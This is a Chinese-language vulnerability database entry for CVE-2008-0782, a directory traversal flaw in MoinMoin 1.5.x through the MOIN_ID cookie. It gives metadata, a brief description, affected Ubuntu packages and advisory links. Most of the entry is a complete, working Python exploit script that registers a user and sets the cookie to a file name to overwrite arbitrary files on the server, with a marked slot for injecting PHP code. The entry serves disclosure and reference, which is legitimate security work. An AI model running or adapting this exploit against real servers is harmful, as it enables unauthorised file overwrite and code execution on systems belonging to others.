MoinMoin MOIN_id Cookie 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114357 漏洞类型 路径遍历
发布时间 2008-01-21 更新时间 2009-01-30
CVE编号 CVE-2008-0782 CNNVD-ID CNNVD-200802-292
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/4957
https://www.securityfocus.com/bid/27404
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-292
|漏洞详情
MoinMoin存在目录遍历漏洞。远程攻击者可以通过一个userform操作的cookie中的MOIN_iduserid(插入..)来覆盖写入任意文件。注意:这个漏洞会通过快捷链接参数扩散到php代码执行。
|漏洞EXP
#!/usr/bin/python
#
#Exploit for the MOIND_ID cookie Bug
# MoinMoin 1.5.x
#
#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
#
#Bug and exploit coded by just a nonroot and colombian user
#
#Enero 21 de 2008
#
#Greets: el directorio and all the SL community
#
# 
import urllib2,sys
print "MoinMoin host: i.e: http://127.0.0.1:8000/"
host=raw_input("MoinMoin host ( include http and /): ")
#info for the new user
#
#user for the test
user='nonroot'
#password for the test
password='nonrootuser'
#email for the test
email='just@nonrootuser.co'
#file to overwrite
#by default this file is there, is there?
archivo='README'
#######
#
req = urllib2.Request(host) 
adddata="action=userform&name="+user+"&aliasname=ilikecolombianpeople&password="+password+"&password2="+password+"&email="+email+"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save"
headers={'Cookie':'MOIN_ID='+archivo}
req = urllib2.Request(host+"UserPreferences/",adddata,headers) 
try:
	r = urllib2.urlopen(req)
	data=r.read()
except	urllib2.HTTPError:
	print "Wait a minute, is posible that the file: "+archivo+" doesn't have permission to write, think well, and try again"
	sys.exit(2)
print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser."
sys.exit(0)

# milw0rm.com [2008-01-21]
|受影响的产品
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu L
|参考资料

来源:XF
名称:moinmoin-readme-file-overwrite(39837)
链接:http://xforce.iss.net/xforce/xfdb/39837
来源:UBUNTU
名称:USN-716-1
链接:http://www.ubuntulinux.org/support/documentation/usn/usn-716-1
来源:BID
名称:27404
链接:http://www.securityfocus.com/bid/27404
来源:MILW0RM
名称:4957
链接:http://www.milw0rm.com/exploits/4957
来源:VUPEN
名称:ADV-2008-0569
链接:http://www.frsirt.com/english/advisories/2008/0569/references
来源:VIM
名称:20080124MoinMoin1.5.xMOIND_IDcookieBugRemoteExploit
链接:http://www.attrition.org/pipermail/vim/2008-January/001890.html
来源:SECUNIA
名称:33755
链接:http://secunia.com/advisories/33755
来源:SECUNIA
名称:29010
链接:http://secunia.com/advisories/29010
来源:hg.moinmo.in
链接:http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
来源:GENTOO
名称:GLSA-200803-27
链接:http://www.gentoo.org/security/en/glsa/glsa-200803-27.xml
来源:DEBIAN
名称:DSA-1514
链接:http://www.debian.org/security/2008/dsa-1514
来源:SECUNIA
名称:29444
链接:http://secunia.com/advisories/29444
来源:SECUNIA
名称:29262
链接:http://secunia.com/advisories/29262